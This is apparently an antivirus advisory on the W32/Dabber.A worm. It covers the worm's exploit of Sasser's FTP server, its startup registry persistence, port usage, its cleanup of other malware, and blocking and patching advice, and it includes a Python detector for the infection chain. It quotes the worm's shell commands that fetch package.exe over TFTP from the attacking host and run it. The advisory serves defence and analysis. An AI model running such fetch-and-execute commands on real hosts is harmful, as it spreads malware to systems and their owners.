W32/Dabber.A!worm

Analysis


Specifics
This 32-bit worm has a packed file size of 29,696 bytes. It attacks only systems that are already infected with the Sasser worm: it exploits a buffer overflow in the FTP server component that Sasser installs (listening on TCP port 5554), using an exploit that overwrites a structured exception handler (SEH) pointer to redirect execution into its payload. Dabber also runs its own TFTP server so that it can serve a copy of itself to the systems it compromises.


Load At Windows Startup
When run, the worm copies itself to the Windows folder as "package.exe". It creates a mutex named "sas4dab"; if that mutex already exists, the worm assumes the system is already infected and exits. It registers itself to load at each Windows startup -

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
sassfix = %Windows%\package.exe


Search For Sasser
The worm scans random IP addresses on destination TCP port 5554, the port on which Sasser's FTP server listens. Hosts that respond become targets: Dabber sends the SEH-overwrite exploit to gain code execution, after which the compromised host opens a remote shell on TCP port 8967. Through that shell Dabber instructs the target to fetch a copy of the worm from the attacking system over TFTP, in this format -

tftp -i (source IP)
GET hello.all package.exe
package.exe
exit

These commands execute "package.exe" after it has been received. Dabber also attempts to copy itself on the target system to this hard-coded path -

c:\Documents and Settings\All Users\Start Menu\Programs\Startup\package.exe


Remote Access Port
Dabber binds TCP port 9898 as a listening port only. After a source system has infected a target, it attempts a connection to TCP port 9898 on the target to confirm that the infection succeeded.
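The propagation chain above (5554 scan, 8967 shell, TFTP pull on UDP/69 from the target back to the source, 9898 verification) is visible from the network side. The following detector is an added example and is not code from Fortinet or this advisory. It correlates connection-log lines per attacking source and reports how far along the chain each target got. The log line format, the sample traffic and the scan threshold of five distinct hosts are all assumptions made up for the example.

```python
import re
from collections import defaultdict

# Ports taken from the write-up above.
SASSER_FTP_PORT = 5554     # Sasser's FTP server, scanned by Dabber
DABBER_SHELL_PORT = 8967   # remote shell opened on the compromised target
DABBER_VERIFY_PORT = 9898  # source connects here to confirm the infection
TFTP_PORT = 69             # target pulls package.exe from the source over TFTP

# Assumption: a source probing this many distinct hosts on 5554 is scanning.
SCAN_THRESHOLD = 5

# Constructed log format (not any vendor's real format):
#   <epoch> <proto> <src_ip>:<src_port> -> <dst_ip>:<dst_port>
LINE_RE = re.compile(
    r"^(?P<ts>\d+)\s+(?P<proto>tcp|udp)\s+"
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+(?P<dst>[\d.]+):(?P<dport>\d+)$",
    re.IGNORECASE,
)


def parse_line(line):
    """Return (ts, proto, src, dst, dport), or None for lines that do not parse."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return (int(m["ts"]), m["proto"].upper(), m["src"], m["dst"], int(m["dport"]))


def analyze(lines):
    """Correlate flows per attacking source into the Dabber infection chain.

    Returns {source: {"scan_targets": n, "compromised": [(target, [stages])]}}.
    A source is reported if it probes >= SCAN_THRESHOLD hosts on 5554 or opens
    the 8967 shell on any host. Stages are listed in the order the worm
    performs them: "shell", then "tftp", then "verify".
    """
    probes = defaultdict(set)  # source -> distinct hosts probed on 5554
    shells = []                # (source, target) pairs in first-seen order
    tftp = set()               # (source, target): target fetched from source via UDP/69
    verify = set()             # (source, target): source connected to target:9898

    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        _ts, proto, src, dst, dport = rec
        if proto == "TCP" and dport == SASSER_FTP_PORT:
            probes[src].add(dst)
        elif proto == "TCP" and dport == DABBER_SHELL_PORT:
            if (src, dst) not in shells:
                shells.append((src, dst))
        elif proto == "UDP" and dport == TFTP_PORT:
            # The TFTP client is the victim and the server is the infected
            # source, so the pair is keyed as (source, target) like the others.
            tftp.add((dst, src))
        elif proto == "TCP" and dport == DABBER_VERIFY_PORT:
            verify.add((src, dst))

    findings = {}
    for src, targets in probes.items():
        if len(targets) >= SCAN_THRESHOLD:
            findings[src] = {"scan_targets": len(targets), "compromised": []}
    for src, dst in shells:
        entry = findings.setdefault(
            src, {"scan_targets": len(probes.get(src, ())), "compromised": []}
        )
        stages = ["shell"]
        if (src, dst) in tftp:
            stages.append("tftp")
        if (src, dst) in verify:
            stages.append("verify")
        entry["compromised"].append((dst, stages))
    return findings


# Constructed sample traffic: 10.0.0.5 scans seven hosts on 5554 and fully
# compromises 10.0.0.12; 10.0.0.7 only reaches the shell stage on 10.0.0.40;
# 10.0.0.20 is ordinary web traffic and must not be reported.
SAMPLE_LOG = """
1086000000 tcp 10.0.0.5:1051 -> 10.0.0.10:5554
1086000001 tcp 10.0.0.5:1052 -> 10.0.0.11:5554
1086000002 tcp 10.0.0.5:1053 -> 10.0.0.12:5554
1086000003 tcp 10.0.0.5:1054 -> 10.0.0.13:5554
1086000004 tcp 10.0.0.5:1055 -> 10.0.0.14:5554
1086000005 tcp 10.0.0.5:1056 -> 10.0.0.15:5554
1086000006 tcp 10.0.0.5:1057 -> 10.0.0.16:5554
1086000007 tcp 10.0.0.5:1058 -> 10.0.0.12:8967
1086000008 udp 10.0.0.12:1200 -> 10.0.0.5:69
1086000009 tcp 10.0.0.5:1059 -> 10.0.0.12:9898
1086000010 tcp 10.0.0.20:2000 -> 10.0.0.30:80
1086000011 tcp 10.0.0.7:3000 -> 10.0.0.40:8967
"""


def main():
    for src, info in sorted(analyze(SAMPLE_LOG.splitlines()).items()):
        print(f"{src}: probed {info['scan_targets']} hosts on TCP/5554")
        for dst, stages in info["compromised"]:
            print(f"  -> {dst}: {' -> '.join(stages)}")


if __name__ == "__main__":
    main()
```

The TFTP direction is the detail that is easy to get wrong: the victim is the TFTP client, so the UDP/69 flow runs from the target back to the already-infected source, the opposite direction from every other stage. A shell on 8967 with no matching TFTP pull or 9898 check (10.0.0.7 above) still warrants a look, since the exploit may have succeeded even if the download did not.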


Other Virus Cleanup Routine
Dabber removes references to other malware by deleting registry values known to be associated with it. Dabber removes these values -

Window
Video Process
TempCom
SkynetRevenge
MapiDrv
BagleAV
System Updater Service
soundcontrl
WinMsrv32
drvddll.exe
navapsrc.exe
skynetave.exe
Generic Host Service
Windows Drive Compatibility
windows
Microsoft Update
Drvddll.exe
Drvddll_exe
drvsys
drvsys.exe
ssgrate
ssgrate.exe
lsasss
lsasss.exe
avserve2.exe
avvserrve32
avserve
Video
Taskmon
Gremlin

from these registry keys -

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Additionally, Dabber deletes the default value of this registry key -

HKEY_CLASSES_ROOT\CLSID\{E6FB5E20-DE35-11CF-9C87-00AA005127ED}\InProcServer32
(Default)


Recommended Action

  • Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option
  • Using the FortiGate manager, block external to internal traffic on UDP port 69 and TCP ports 5554, 8967 and 9898
  • For Windows XP users, enable the built-in personal firewall - it blocks unsolicited inbound traffic and would stop both the exploit against port 5554 and the shell connection on port 8967
  • Ensure affected systems are updated with the latest Microsoft security patches, specifically MS04-011, which addresses the LSASS vulnerability that Sasser exploits; a system that cannot be infected by Sasser does not run the FTP server that Dabber targets

Telemetry

Detection Availability

FortiGate
Extended
FortiClient
FortiMail
FortiSandbox
FortiWeb
Web Application Firewall
FortiIsolator
FortiDeceptor
FortiEDR

Version Updates

Date Version Detail
2023-01-17 90.09734
2022-05-21 90.02492